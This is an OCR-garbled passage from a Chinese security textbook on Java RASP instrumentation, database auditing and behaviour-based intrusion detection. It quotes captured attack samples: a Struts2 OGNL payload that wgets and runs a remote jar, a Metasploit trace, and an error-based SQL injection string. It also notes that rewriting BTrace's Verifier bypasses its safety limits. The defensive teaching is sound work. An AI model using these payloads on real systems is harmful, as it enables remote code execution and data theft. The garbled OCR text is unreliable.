修改 rt.jar 。rt.jar 是 Java 基 础 类 库 ， 位 于 {Java_Home}jre/lib/ 下 。 
Java 中 对 于 文件 系统 ， 网 络 ， 数 据 库 的 访问 ， 以 及 操作 系统 命令 的 调 
用 ， 都 是 通过 调用 rtjar 中 相应 的 类 来 实现 的 。 为 了 得 到 上 面 这 些 方法 的 
调用 信息 ， 可 以 改变 这 些 相 关 类 ， 在 代码 中 加 入 日 志 信 息 ， 并 将 改变 后 
的 类 打包 成 新 的 rt,jar， 替 换 掉 {Java_HomeHire/lib/ 下 原来 的 jar 包 。 这 样 
在 这 些 类 被 调用 时 ， 就 可 以 得 到 调用 的 日 志 信息 





优势 : 简单 ， 性 能 好 。 


缺点 : 静态 珍 换 ， 无 法 动态 加 入 新 的 监控 点 ， 可 维护 性 差 ， 和 jdk 
K AAT 0 


JVMTI (JVM Tool Interface) 是 Java 虚 拟 机 所 提供 的 native 编 程 接 
口 ， 因 此 使 用 JVMTI 需 要 我 们 与 C/C++ 以 及 JNI 打 交道 ， 开 发 时 一 般 采 用 
建立 一 个 Agent 的 方式 来 使 用 JVMTI， 把 Agent 编 译 成 一 个 动态 链接 库 ， 
设置 一 些 回 调 函 数 ， 并 从 Java 虚 拟 机 中 得 到 当前 的 运行 态 信 息 。JVMTI 
的 功能 非常 丰富 ， 包 含 了 虚拟 机 中 线程 、 内 存 、 堆 栈 、 类 、 方 法 、 变 





量 、 事 件 、 定 时 器 处 理 等 20 多 类 功能 。 





由 于 使 用 native 语 言 ， 运 行 在 虚拟 机 之 外 ，JVMTI 方 案 对 于 性 能 、 
内 存 汇 漏 、 故 障 检 测 程序 来 说 上 其 有 很 多 优点 ， 如 下 所 示 : 














D 功能 强大 ， 能 够 看 到 更 多 的 信息 : 如 GC、 锁 、 线 程 。 


2) 即使 虚拟 机 出 现 问题 时 ，Agent 也 可 以 继续 收集 到 虚拟 机 的 信 


cil 


3) VRAD Y REID LAY SH, Sit tay AN FF H o 








4) 性 能 更 好 : native 语 言 更 高 效 ; 在 JVMTI 层 有 的 接口 更 高 效 ， 例 


如 .stack traces。 


缺点 : 


1) JVMTI 接 口 复杂 ， 实 现 起 来 也 比较 麻烦 。 


2) BHE: 由 于 是 native 语 言 ， 需 要 在 不 同 的 操作 系统 上 分 别 编 


译 和 测试 。 


3) 稳定 性 差 : 由 于 和 JVM 同 时 运行 在 一 个 进程 中 ， 并 且 在 JVM 之 
外 ， 任 何 的 错误 容易 引起 整个 进程 的 退出 。 


(1) Java Agent 





Java Agent Instrumentation 的 最 大 作用 融 是 类 定义 动态 改变 和 操作 。 
在 Java SE 5 中 首次 引入 ，Instrument 要 求 在 运行 前 利用 命令 行 参 数 或 者 
系统 参数 来 设置 代理 类 ; 在 Java SE 6 里 面 ，instrumentation 包 被 赋予 了 
更 强大 的 功能 : 启动 后 的 instrument、 本 地 代码 (native code) 


instrument， 以 及 动态 改变 classpath 等 。 


事实 上 ,“java.lang.instrument" 包 的 具体 实现 ， 依 赖 于 JVMTI: 在 
Instrumentation 的 实现 当中 ， 存 在 一 个 JVMTI 的 代理 程序 ， 通 过 调用 
JVMTI 当 中 Java 类 相关 的 函数 来 完成 Java 类 的 动态 操作 。 











由 于 Java Agent 是 纯 Java 的 接口 ， 具 有 以 下 优点 : 
1) 接口 简单 ， 实 现 相 对 JVMTI 容 易 。 


2) 通用 性 好 ， 运 行 在 JVM 中 ， 不 用 考虑 操作 系统 的 差 腊 。 





3) 稳定 性 好 : JVM 对 于 运行 在 其 中 的 代码 做 了 很 多 保护 ， 来 防止 
错误 的 代码 引起 进程 的 退出 。 


缺点 : 
1) 相 比 JVMTI 功 能 少 一 些 ， 但 对 于 安全 的 Agent 足 够 。 
2) 有 些 接口 例如 stack traces 的 比 JVMTI 性 能 差 。 


(2) Btrace 


Btrace 是 由 Kenai 开 发 的 一 个 开源 项 目 ， 它 可 以 用 来 帮 我 们 做 运行 时 


监控 等 等 操作 。Btrace 是 由 : Attach API+BTrace 脚 本 


的 Java 程 序 分 析 > LÍ SFSF 
解析 引擎 +ASM+JDK6 Instumentation 组 成 。 


Btrace 是 一 个 安全 ， 可 以 动态 跟踪 Java 程 序 的 一 种 工具 。Btrace 的 初 


庙 是 要 “跟踪 代码 ”， 而 不 是 修改 代码 ， 他 的 操作 不 会 对 原 有 Java 进 程 产 
生 影 响 ， 不 用 关闭 正在 运行 的 Java 进 程 ， 也 不 会 修改 Java 进 程 中 的 逻辑 


和 数据 。 
由 于 Btrace 是 基于 Java Agent (Instumentation) 实现 的 ， 除 了 
Instumentation 同 样 的 优点 外 ， 还 具有 如 下 优点 : 





1) 不 用 实现 ， 直 接 可 用 ， 只 需 写 BTrace 脚 本 即 可 。 


2) 安全 性 好 ， 对 原 有 的 Java 程 序 只 读 ， 没 有 任何 修改 。 


缺点 : 只 能 实现 信息 的 读 取 ， 无 法 实现 阻 断 。 


BTrace 的 安全 性 检查 是 通过 Verifier 来 实现 的 ， 规 范 可 参照 JSR 
|。 重 写 Verifier 可 以 实现 


269。 将 该 类 重 写 就 可 以 突破 BTrace 的 安全 限制 
BELL o 
(3) HotCode2 


HotCode2 是 一 款 纯 Java 实 现 的 全 站 式 热 部 署 解决 方案 ， 无 论 是 修改 


Java 文 件 还 是 框架 配置 文件 ， 也 不 管 你 是 在 本 地 还 是 远程 开发 机 部 署 ， 

都 无 需 重 局 Java 虚 拟 机 而 立即 生效 ， 从 而 减少 开发 过 程 中 频繁 编译 打包 
和 部 署 的 次 数 。HotCode2 本 质 上 是 一 个 Java Agent， 因 此 可 以 运行 在 任 
何 Java 程 序 之 上 。HotCode2 的 核心 功能 是 提供 对 Java 文 件 的 热 部 署 功 

能 ， 通 过 字 节 码 变换 ，HotCode2 突 破 了 Hotswap 的 只 能 修改 方法 体 的 限 
制 ， 可 以 让 你 对 一 个 类 进行 任意 修改 。HotCode2 通 过 SDK 的 形式 提供 了 
对 各 种 框架 的 支持 ; Java 文 件 修改 + 框架 支持 ， 真 正 实现 一 站 式 热 部 车 
解决 方案 ， 他 不 像 Btrace 那 样 有 脚本 分 析 引 擎 和 ASM， 如 果 要 实现 规则 
的 自动 部 署 ， 需 要 自己 实现 规则 分 析 引 擎 和 ASM 部 分 。 

















除了 具有 Java Agent (Instumentation) 同样 的 优点 外 ，HotCode2 还 
上 其 有 如 下 优点 : 突破 了 Hotswap 的 只 能 修改 方法 体 的 限制 ， 可 以 让 你 对 


一 个 类 进行 任意 修改 。 








缺点 有 以 下 两 点 : 





需要 目 己 实现 规则 分 析 引 车 和 ASM 部 分 。 





为 了 实现 任意 修改 类 ， 每 个 类 都 会 额外 增加 两 个 特殊 的 Filed 和 通 
用 的 构造 函数 ， 对 线 上 代码 改动 大 ， 增 加 了 风险 。 





Java 环 境 与 PHP 有 很 大 的 不 同 ， 我 们 可 以 从 调用 栈 获 取 更 多 关于 攻 
cSt EY A : 


1) 在 RASP 检 测 到 关注 的 高 危 事 件 时 ， 可 以 通过 打印 调用 栈 来 获取 
高 危 调 用 前 后 的 调用 链 ， 并 以 此 快速 定位 漏洞 入 口 ， 甚 至 是 攻击 流程 。 
如 下 调用 栈 ， 是 一 个 典型 的 struts2 漏 洞 利 用 执行 命令 时 的 调用 栈 《〈 缩 
HS ) 信息 : 








"stack_trace": [ 


"clazz": "java.lang.ProcessBuilder", 
"method": "start" 
}, 
{ 
"clazz": "sun.reflect.NativeMethodAccessorImpl", 
"method": "invokeo" 
} 
{ 
"clazz": "ognl.OgnlRuntime", 
"method": "callMethod" 
} 
{ 
"clazz": "org.apache.struts2.impl.StrutsActionProxy", 
"method": "execute" 
} 
{ 
"clazz": "org.apache.catalina.core.StandardContextValve", 
"method": "invoke" 
} 





2) 获取 因 何 http 请 求 触 发 的 API 调 用 。 我 们 可 以 从 
javax.servlet.http.HttpServlet 监 控 监 控 所 有 HTTP request 请 求 的 具体 Java 调 
用 栈 。 如 下 测试 用 例 抓 取 的 信息 可 以 看 到 ， 这 里 既 有 攻击 请 求 URI， 也 
有 payload， 也 有 remote 记 ， 加 上 前 面 的 漏洞 利用 点 调用 栈 前 后 信息 ， 信 

娠 量 非常 丰富 ， 无 需 后 端 数据 分 析 系 统 再 去 组 装 碎片 信息 ， 一 步 到 位 ! 











"http_request": { 
"method": "GET", 
"request_uri": "/struts2-blank/example/HellowWorld.action", 


"query_string": "redirect:%24{(new+ java.lang.ProcessBuilder (new+ 
java.lang.String[]{ 'wget', '1.1.1.1:8080', '-0O', '/tmp/dGLlIprqPRZfgp'})) .star 
"remote_addr": "2.2.2.2", 

"headers": [ 


"name": "host", 

"value": "3.3.3.3:8080" 
F 
{ 

"name": "user-agent", 

"value": "Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1) " 
} 





2. 基 于 JavaRASP 的 攻击 检测 











任何 一 种 检测 模型 的 建立 ， 是 基于 对 攻击 场景 的 理解 ， 以 及 场景 数 
据 的 观察 之 上 。 





基于 高 危 行为 组 合 的 检测 模型 








从 攻击 场景 来 看 ， 攻 击 行为 基本 集中 在 文件 IO 读 写 、 命 令 执行 、 代 
码 注 入 执行 、 网 络 连 接 、 外 部 自 定 义 jib 库 加 载 等 行为 ， 那 么 一 个 
webshell 其 至 是 漏洞 与 业务 入 口 的 区 别 就 是 前 述 众 多 高 危 调用 是 否 同一 
时 间 窗 口内 频繁 在 同一 URI 触 发 ， 如 图 8-15 所 示 。 





基于 调用 栈 的 检测 模型 


一 个 漏洞 的 利用 ， 除 去 他 的 payload 之 外 ， 利 用 的 前 提 是 遵循 漏洞 环 
卉 的 调用 关系 ， 那 么 payload+ 漏 洞 触发 条 件 这 条 调用 栈 ， 就 是 对 攻击 行 
为 攻击 向 量 的 最 精准 刻画 。 如 图 8-16 所 示 。 


/struts2-blank/example/HelloWorld.action 


java.lang.ProcessBuilder(new+ java.lang.String[]{ ‘wget’, '1.1.1.1:8080', ~- 
O', "Kf5zhB.jar‘})) .start() 


/struts2-blank/example/HelloWorld.action 


ProcessBuilder("/path/to/java", "-jar", "Kf5zhB.jar") 


/struts2-blank/example/HelloWorld.action 


new FileOutputStream("Kf5zhB. jar") 





图 8-15 “组合 检测 模型 


/struts2-blank/example/HelloWorld.action 


"clazz": "java.io.FileOutputStream", 
"method": "<init>" 


"clazz": "metasploit. Payload", 
"method": "writeEmbeddedFile" 


{ 
"clazz": "java.lang.reflect Method", 
"method": "invoke" 

h 


{ 


"clazz": "ognl.ObjectM ethodAccessor" 
"method": "callMethod" 


} 





图 8-16 调用 栈 的 检测 模型 


8.4 数据 库 审 计 


一 个 企业 的 最 核心 资产 莫 过 于 数据 ， 在 互联 网 企业 则 是 更 其 。 近 些 
年 互联 网 企业 “去 IOE” 运 动 使 得 数据 库 产 品 均 倾 癌 于 mysql 或 MySQL 衍 
生产 品 。 那 么 基本 上 提 到 数据 库 审计 ， 主 要 就 是 MySQL 相 关 的 审计 产 





口 
HH o 


1.53 A 


旁 路 审计 几乎 是 传统 乙方 安全 CH ILAREN, L ce BE 
像 流 量 ， 审 计 设 备 解码 组 包 DB 流 量 ， 并 存储 分 析 ， 通 过 模型 检测 和 人 退 
漳 可 括 和 高 危 事 件 。 如 图 8-17 所 示 。 


Ht 型 





ft 


数据 库 A 数据 库 B 数据 库 C 


图 8-17 “和 劳 路 型 BD 审 计 设 备 


这 样 的 架构 好 处 在 于 部 署 简单 ， 对 于 业务 方 和 用 户 来 说 几乎 是 透明 
的 ， 部 署 过 程 无 需 业 务 方 参与 。 同 时 对 业务 几乎 无 性 能 损耗 ， 这 也 是 业 
务 方 最 关注 的 一 反 。 





2. 主 机 型 


旁 路 型 固然 有 它 的 优势 ， 但 当面 对 复杂 的 业务 架构 的 时 候 就 力 不 从 
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不 穷 。 大 型 互联 网 公司 业务 环境 每 日 大 量 的 变更 ， 以 全 于 想 完全 梳理 清 
楚 其 网 络 架构 特别 是 DB 访问 模型 几乎 是 不 可 能 的 事 ， 全 少 很 难 在 一 个 
较 短 的 时 间 内 有 一 个 相对 静止 的 染 构 图 。 





笔者 在 互联 网 企业 任职 期 间 参 与 过 儿 次 DB 审计 厂商 (包括 国外 ) 
的 产品 推介 会 和 评审 ， 结 果 都 是 无 疾 而 终 。 其 产品 技术 能 力 什 么 的 都 不 
古 问 题 ， 最 大 的 原因 就 是 杂 构 和 部 署 还 是 传统 厂商 的 模式 ， 根 本 不 能 适 
应 互联 网 公司 的 环境 。 璧 如 它们 要 求 在 网 络 节 点 处 部 车， 但 互联 网 业务 
环境 决定 了 这 种 所 谓 的 节点 太 多 太 多 ， 以 一 僚 设 备 动 驾 儿 十 万 的 价格 ， 
计算 下 来 价格 已 经 是 不 可 接受 。 其 次 业务 错综复杂 的 数据 库 访 问 链 路 ， 
使 得 其 仪 聚焦 于 茶 些 节 点 的 模式 几乎 可 以 断定 一 定 会 遗漏 很 多 事件 。 























那么 解决 办 法 是 什么 ” 那 就 是 审计 产品 尽量 靠近 DB 本 身 部 普 ， 最 
近 的 葛 过 于 部 署 到 DB Server 主 机 上 ， 这 就 是 主机 型 产品 的 由 来 。 主 机 
型 的 DB 审计 产品 可 以 是 单个 进程 也 可 以 是 HIDS 的 某 个 模块 ， 参 见 图 8- 
18。 





数据 传输 


DBAuditor 





Agent 


图 8-18 ”基于 HIDS 模 块 的 DB 审计 产品 





3. 代 理 型 


在 业务 架构 治理 做 得 较 好 的 公司 ， 他 的 业务 数据 读 写 均 有 统一 的 接 
口 ， 无 论 业 务 逻 辑 多 么 复杂 ， 其 DB 流量 都 是 统一 的 入 口 ， 那 么 在 这 些 
接口 位 置 增加 DB 审计 功能 是 最 完美 的 方案 ， 参 见 图 8-19。 






应 用 层 


DBproxy 


MySQL Oracle 


图 8-19 ”基于 代理 的 DB 审计 产品 






调度 、 负 载 均 衡 a DBauditor 







存储 








这 样 的 以 构 带 来 了 一 个 近乎 完美 的 产品 形态 ， 有 以 下 诺 多 优点 : 


AE: 不 需要 像 其 他 产品 一 样 逐一 去 网 络 节 后 或 主机 部 署 ， 其 数 
据 采 集 和 filter 功 能 原生 集成 在 业务 架构 里 。 


-减少 性 能 开销 ， 基 于 DB 协议 的 数据 劳 路 ， 不 需要 基于 网 络 报 文 数 
据 的 处 理 ， 组 包 等 开销 。 


4. 攻 击 检测 


DB 审计 安全 产品 主要 解决 两 个 问题 : 1) SQL 注入 拖 库 1 2) 操作 
违规 审计 。 


对 于 违规 审计 没有 太 多 需要 讲 的 ， 通 过 对 日 第 的 DB 请 求 做 好 基线 





学 习 ， 超 出 基线 范围 之 外 的 则 为 违规 行为 。 基 线 学 习 的 维度 可 以 有 以 下 
Pets 


Wi Pt DA a H DB Ty RY - 
:账户 常用 的 function。 
:账户 十 dient_ip 与 tables 的 映射 。 


应 用 与 数据 字段 的 映射 。 





. 目 然 时 间 + 频 上 度 与 裤 表 的 映射 。 


虽然 上 述 基线 学 习 主 要 用 于 审计 ， 但 对 于 业务 相对 固定 以 及 安全 检 
M IE BD AN ZERRAK H, A te ie A. AA 
击 行为 也 是 超出 基线 范围 的 。 








对 于 业务 较 多 、 变 更 较 多 的 企业 ， 上 述 方式 用 于 攻击 检测 显然 不 适 
合 了 ， 相 对 于 业务 的 生命 周期 、 变 更 周期 来 说 基线 的 学 习 期 过 长 。SQL 
注入 攻击 通常 的 检测 方式 是 使 用 相对 固化 的 字符 串 特 征 轧 配 ， 而 这 类 检 
测 方 式 会 面临 各 种 变形 SQL 语 句 的 绕 过 攻击 。 


事实 上 无 论 黑 客 如 何 变换 攻击 负载 ， 它 最 终 要 能 被 DB 解析 ， 满 足 
语法 和 要求。 那么 通过 语法 解析 器 的 人 还原， 任何 的 伪装 均 会 褪去 。 





语法 解析 之 后 的 语句 就 再 要 定义 辨别 是 否 恶意 的 请 求 了 ， 诸 如 以 下 


几 种 场景 : 
.有 多 个 子 查 询 、 联 合奏 询 且 查询 系统 库 表 。 
:可 能 导致 SQL 查询 失败 的 语句 。 


-多 个 联合 查询 ， 且 子 查 询 非 业务 所 需 库 表 。 





将 原始 SQL 请 求 使 用 语法 解析 器 〈Python 的 sqlpare 模 块 ) 格式 化 之 
后 的 语句 ， 可 以 清晰 地 看 到 SQL 语句 被 递归 拆 分 成 了 function+parameter 
的 展现 形式 : 





print(sqlparse.format('select msg from news where id=2 and(select 1 from(select 
count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,md5(1122),0 
X27,0x7e) FROM modoer_admin LIMIT ©,1)) from information_schema.tables limit 

0,1), floor(rand(0)*2))x from information_schema.tables group by x)a)',reindent=True: 
select msg 


from news 
where id=2 and 
(select 1 
from 
(select count(*),concat( 
(select 
(select 


(SELECT distinct concat(0x7e,0x27,md5(1122), 0x27, 0x7 
FROM modoer_admin LIMIT 0,1)) 
from information_schema.tables limit 0,1),floor(rand(0)*2))> 
from information_schema. tables 
group by x)a) 





其 实 SQL 注 入 就 是 本 该 只 允许 输入 parameter 的 地 方 被 恶意 插入 了 
function Ji] HH AFT. 那么 如 何 检 测 则 应 该 清楚 了 。 


8.5 ”入侵 检测 数据 分 析 平 台 


8.5.1 ”架构 选择 





常规 的 安全 产品 可 能 是 一 个 杀毒 软件 、 一 个 IDS、 一 个 WAF， 这 能 
解决 一 个 单 点 安全 问题 ， 但 如 果 没 有 全 局 的 信息 汇聚 与 分 析 ， 很 难 实现 
对 全 局 态势 的 感知 。 











云 计 算 与 云 安 全 是 第 被 提起 的 概念 ， 在 大 型 网 络 中 ， 因 应 用 服务 器 
对 于 性 能 消耗 较为 敏感 ， 很 多 复杂 的 安全 分 析 逻 辑 不 易 和 被 业务 部 门 接 
受 ， 部 车 于 主机 和 网 络 上 的 设备 只 被 限制 在 实现 提取 数据 功能 。 分 析 与 
计算 在 后 端 也 残 是 所 请 的 云端 来 实现 。 








采集 与 计算 的 分 离 带 来 了 诸多 优点 : 


假设 (几乎 是 必然 出 现 ) 单 点 系统 被 黑客 攻陷 ， 安 全 策略 不 易 被 
逆 回 与 历 取 ， 避 免 因 策 略 失 镭 融 来 的 ， 对 手 针 对 性 研究 绕 过 手法 ; 


.可 快速 更 新 检测 策略 ， 减 少 对 各 子 节点 和 探测 设备 的 变更 ， 避 锡 
干扰 业务 系统 的 稳定 ; 





原始 数据 的 短 时 存储 ， 便 于 对 事件 演变 过 程 的 重 现 ， 方 便 追 调 审 
计 ， 以 及 预 研 新 检测 逻辑 的 验证 。 


8.5.2 ”功能 模块 


大 型 网 络 的 安全 监测 产品 通常 有 各 类 SOC 系 统 、 分 布 式 安全 产品 ， 
以 及 云 安 全 产品 。 产 品 形式 千变万化 ， 但 功能 模块 可 以 简化 如 图 8-20 所 
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入 侵 检测 体系 








络 数据 || 主 机 信息 || 应 用 服 || 数据 格 |) 入 侵 检 镍 全 局 数 
采集 采集 外务 记录 有 R fh 测 规则 |) 据 挖 掘 


图 8-20 入侵 检测 体系 模块 


通常 SOC 系 统 会 收集 各 种 日 志 ， 各 种 NIDS\HIDS 都 有 数据 采集 功 
尽 可 能 多 的 采集 数据 对 于 入 侵 分 析 是 很 有 帮助 的 。 


但 我 们 面 对 入 侵 事件 时 ， 第 稼 面临 两 种 塌 众 局 面 : 


数据 很 少 。 仅 有 部 分 系统 \ 应 用 默认 日 志 。 如 侦探 破案 一 般 ， 发 现 
入 侵 事件 最 重要 的 是 有 证 据 。 通 常 系统 默认 的 日 志 等 数据 无 法 满足 入 侵 
事件 分 析 需 求 ， 必 须 开 发 专门 的 探测 器 。 先 需要 梳理 场景 对 抗 需 求 ， 摘 
清楚 检测 某 类 攻击 所 需 数 据 类 别 与 纬度 ， 并 将 此 作为 数据 采集 系统 的 开 
发 需求 ， 过 程 如 图 8-21 所 示 。 








检测 规则 数据 纬度 - 开发 需求 





图 8-21 数据 需求 








数据 很 多 。 大 型 网 络 中 各 类 数据 很 多 ， 甚 至 多 至 无 法 记录 。 数 据 
并 非 越 多 越 好 ， 特 别 是 大 型 网 络 的 海量 数据 ， 如 全 部 汇集 存储 是 难以 文 
撑 的 。 且 大 量 的 噪音 数据 也 只 会 带 来 硬件 与 人 力 成 本 的 增加 。 真 正 流入 
最 后 存储 与 分 析 系 统 的 数据 ， 必 然 是 经 过 精简 与 格式 化 之 后 的 ， 如 图 8- 
22 上 所 示 。 





分 析 需 求 按 需 采 集 规则 筛选 ”人 格式 化 


图 8-22 ”数据 精简 


2. 数 据 分 析 





有 了 数据 不 等 于 有 检测 能 力 ， 首 先 第 一 个 问题 就 是 如 何 理解 你 获得 





的 数据 ， 这 就 是 数据 格式 化 。 


定义 格式 化 数据 需 做 以 下 工作 : 


分析 规 则 决定 数据 纬度 。 





关联 逻辑 定义 字段 扩展 。 


有 了 格式 化 好 的 数据 ， 就 实现 了 数据 自动 化 分 析 的 第 一 步 ， 接 下 来 
才 是 分 析 引 擎 与 规则 建设 。 


8.5.3 “分析 能 








但 凡 有 一 点 渗透 经 验 的 人 ， 对 于 无 论 是 杀毒 软件 还 是 WAFNDS 系 统 
都 知道 使 用 各 种 逃避 检测 的 手段 。 现 在 我 们 面 对 的 是 有 一 定 反 检 测 能 
的 攻击 者 ， 特 别 是 高 级 APT 攻 击 通常 较 为 隐蔽 ， 不 易 触 发 单 点 的 安全 策 
略 和 检测 ， 需 要 更 多 纬度 和 大 视角 的 数据 分 析 。 














传统 安全 产品 单纯 依靠 特征 库 的 检测 模式 ， 效 果 已 大 打折 扣 。 黑 客 
工具 千变万化 ， 攻 击 手 法 层出不穷 ， 但 他 们 的 目的 不 变 ， 行 为 是 殊 途 同 
归 的 。 所 以 ， 在 原 有 特征 检测 技术 之 外 ， 用 行为 模型 能 更 好 地 检测 入 
侵 ， 我 们 提出 以 下 检测 模型 。 


1. 单 点 事件 描述 数据 的 行为 分 析 


例如 一 个 进程 的 启动 ， 进 程 自 身 的 行为 与 环境 信息 ， 如 图 8-23 所 


File Options View Process Find Users Help 
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图 8-23 ”异常 进程 
这 里 你 看 到 了 什么 ? 以 下 均 可 作为 恶意 进程 检测 规则 。 


` 父 进程 为 IE。 





进程 运行 在 下 缓存 目录 。 





.进程 PE 信息 : 加 壳 ， 未 签名 ， 多 个 PE 头 部 等 。 
2. 上 下 文 事件 关联 分 析 


例如 一 个 进程 状态 的 变化 ， 以 及 父子 进程 状态 的 变化 ， 如 图 8-24 所 


这 是 ProFTPD 的 一 个 远程 缓冲 区 溢出 漏洞 攻击 后 的 结果 ， 从 pstree 
可 以 看 到 proftpd 进 程 派 生 了 一 个 bash 子 进程 。 正 常情 况 下 bash 通 常 只 会 
从 系统 登录 后 的 SSHD\ogin 等 进程 启动 ， 这 可 作为 一 个 异常 告警 逻辑 。 
大 家 再 想 想 这 个 场景 还 会 有 那些 特征 ? 


-firefox---run-mozilla. sħ---firefox-bin-+-plugin-containe---{p 
| | 


| 
| 
|-qnome-terminal-+-3*[ bash) 

| |-bash-+-grep 
| 

| 


|-ba netcat 
-avisd-tra 
|-proftpd--- 
| -sshd 





图 8-24 ProFTPD 漏 洞 


3. 规 则 摘 述 





规则 代码 的 示例 如 下 所 示 : 





"dsc":"Remote code execute", 
"cache": { 
Socket=1, 
cmd!=sshd|logoin 


}, 

"rule": { 
ip=cache.ip, 
ppid=cache.ip.pid, 
cmd=/bin/shell 





4. 多 数据 纬度 关联 分 析 
例如 : NIDS 与 HIDS 的 数据 联动 分 析 ， 如 图 8-25 所 示 。 


. 
a. 


非 正常 业务 逻 + 非 正 常 业 务 ue. g 3 = 
辑 的 文件 上 传 CGI 生成 一 < 文件 上 传 漏洞 = 


+ 
ê&— 0 e391 a) 


a 
NIDS HIDS 


图 8-25 多 系统 数据 关联 


NIDS 上 出 现 非 正常 业务 逻辑 的 文件 上 传 事件 ， 与 此 几乎 同时 ， 
HIDS 出 现 一 个 CGI 文 件 生 成 事件 ， 可 作为 可 疑 webshell 上 传 行为 规则 。 
上 传 漏洞 千变万化 ， 导 致 入 侵 者 能 上 传 webshell 的 原因 也 千奇百怪 ， 我 
们 乡 需 为 每 一 个 web 漏 洞 建立 检测 规则 ， 形 成 及 肿 的 规则 库 ， 只 要 符合 
上 述 行为 特征 ， 就 能 被 发 现 。 


总 结 上 诉 架 构 与 分 析 逻 辑 ， 我 们 得 出 整体 架构 图 见 岁 8-26。 





图 8-26 ”入 侵 检测 系统 简化 架构 


8.5.4 ”实战 演示 





前 面 洋 洋酒 酒 写 那 么 多 ， 不 如 实战 来 得 实际 。 下 面 我 们 通过 对 一 个 
确切 的 攻击 场景 实现 检测 能 力 来 实践 前 面 的 思路 。 


1. 场 景 分 析 








在 黑客 入 侵 过 程 中 ， 通 常 有 一 个 环节 ， 就 是 通过 漏洞 对 自身 拥有 的 
权限 进行 提升 ， 简 称 提 权 。 和 常见 的 提 权 手法 是 ， 发 现 系 统 存在 的 漏洞 ， 
执行 漏洞 利用 程序 ，exp 利 用 漏洞 获取 一 个 高 权限 的 shel， 如 图 8-27 所 
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执行 explcit 
ecmd.exe(user=system) 
e/bin/bash(uid=0) 





CVE 2013-3660 
CVE 2009-2692 










*EPATHOBJ_exp.exe 
esock_sendpage.c 


高 权限 shell 


图 8-27 ” 提 权 行为 分 析 
2. 检 测 思 路 


通过 前 面 的 分 析 和 测试 ， 我 们 会 发 现 一 个 提 权 攻击 中 的 特点 ， 那 就 
是 exploit 工 具 目 身 在 执行 时 是 低 权限 ， 而 得 到 的 shell 是 高 权限 。 


有 了 对 场景 的 清晰 认识 ， 检 测 逻 辑 也 就 很 清楚 了 : 


某 个 高 权限 (system? uid=0? ) 进程 (bash? cmd.exe? ) 的 父 进 


程 为 低 权限 ， 则 告警 。 


3. 系 统 实现 





数据 采集 需求 : 根据 前 面 大 节 中 的 思路 ， 我 们 有 了 场景 有 了 规则 ， 
可 以 考虑 采集 那些 数据 以 及 数据 纬度 了 。 在 这 个 场景 中 ， 规 则 分 析 至 少 
需要 用 到 几 个 必 备 的 进程 数据 纬度 : 进程 权限 、 进 程 ID、 父 进程 ID。 


规则 逻辑 如 下 : 





"dsc":"Local Privilege Escalation", 
"cache": { 
uid>0 


}, 

"rule":{ 
ip=cache.ip, 
ppid=cache.ip.pid 
uid=0 








以 上 检测 规则 基本 上 能 满足 多 数 提 权 场 景 ， 但 实际 运用 中 还 有 一 些 
细节 需 读者 目 己 去 思考 完善 ， 例 如 : 


同样 满足 父 进程 权限 低 ， 子 进程 权限 高 的 正常 场景 有 哪些 ， 如 何 
去 除 误 报 ? 





数据 关联 分 析 中 ， 分 析 流 程 同 前 追溯 还 是 隔 后 退 调 更 易 实 现 ， 更 
符合 你 自己 分 析 系 统 的 架构 ? 


提 权 攻击 除了 上 述 提 到 的 场景 ， 还 有 哪些 ? 





我 们 可 以 看 到 ， 从 行为 描述 很 容易 刻画 攻击 场景 ， 从 而 实现 检测 ， 
纵使 攻击 手法 干 变 万 化 ， 而 关键 路 径 是 不 易 改变 的 。 通 过 行为 模型 实现 
检测 能 力 ， 避 免 了 各 目 漏洞 搁 术 细节 锚 异 带 来 的 规则 库 见 余 〈 且 影响 安 
全 系统 性 能 ) ， 也 避免 因 检测 规则 过 分 针对 细节 《特征 库 \ 漏 洞 库 ) 可 
能 导致 的 被 经过 。 








以 上 和 是 在 实际 入 侵 对 抗 实践 中 ， 根 据 公 司 网 络 目 身 环境 ， 外 部 威胁 
特点 不 断 总 结 出 来 一 些 浅 显 经 验 。 总 的 归纳 为 : 入 侵 事 件数 据 化 、 入 侵 
检测 模型 化 、 事 件 分 析 平 台 化 。 


在 针对 不 同 网 络 环境 、 安 全 威胁 形势 、 对 抗 要 求 ， 还 须 络 合 目 身 情 
况 做 不 少 优化 和 变化 。 个 人 认为 前 述 无 论 是 架构 还 是 数据 分 析 模 型 ， 是 
在 现 有 网 络 海量 数据 、 业 务 环 境 奇 刻 、 外 部 威胁 多 变 的 情况 下 一 种 较为 
经 济 易 行 的 入 侵 检 测 思路 。 





8.6 入侵 检测 数据 模型 








在 入 侵 检测 攻防 对 抗 中 ， 通 常 我 们 的 做 法 是 对 每 一 类 攻击 场景 给 出 
检测 规则， 防守 方 往往 处 于 被 动 的 境地 ， 因 为 攻 方 有 太 多 的 绕 过 与 逃逸 
手段 ， 使 得 我 们 面 对 大 量 的 漏洞 和 攻击 手法 而 手足 无 措 。 下 面 通过 对 入 
侵 场景 的 细致 分 析 ， 转 换 视角 来 帮助 大 家 扭转 防守 方 的 被 动 局 面 。 


1.“ 我 们 的 ”战场 


说 起 攻防 对 抗 ， 大 家 很 熟悉 的 一 句 话 是 :“ 攻 击 只 需 一 点 即 可 得 
手 ， 而 防守 必须 全 面 设防 ”。 可 见 多 数 时 候 ， 防 守 方 很 被 动 。 但 在 我 看 
来 ， 防 守 方 其 实 是 有 优势 的 。 无 论 坏人 多 么 狐 独 ， 他 也 是 在 我 们 的 主场 
作战 。 我 的 系统 我 做 主 ， 孙 猴子 再 怎么 折腾 也 逃 不 出 如 来 佛 的 五 指 山 。 








目前 常见 的 攻击 手法 都 是 针对 目标 的 web 系统， 或 主机 系统 层面 。 
既然 整个 战场 所 在 的 操作 系统 以 及 网 络 设备 均 是 防守 方 的 ， 理 论 上 我 们 
可 以 在 任意 纬度 构建 安全 产品 和 制定 安全 策略 ， 相 对 来 说 攻击 行为 则 处 
一 个 较 低 纬度 领域 的 活动 。 如 何 理 解 这 个 纬度 呢 ， 我 们 先 用 一 张 图 来 展 
示 我 们 的 战场 纬度 ， 如 图 8-28 所 示 。 


欺诈 \ 数 据 盗 取 








系统 API 
N LIBClexploit ante LIBXXX OtherLIB 
snifer\arpspoof 





图 8-28 ”战场 纵深 视图 


2. 高 维 防 守 


当 攻 防 双方 在 同一 纬度 时 ， 攻 击 者 会 有 很 多 途径 实现 攻击 ， 而 防守 
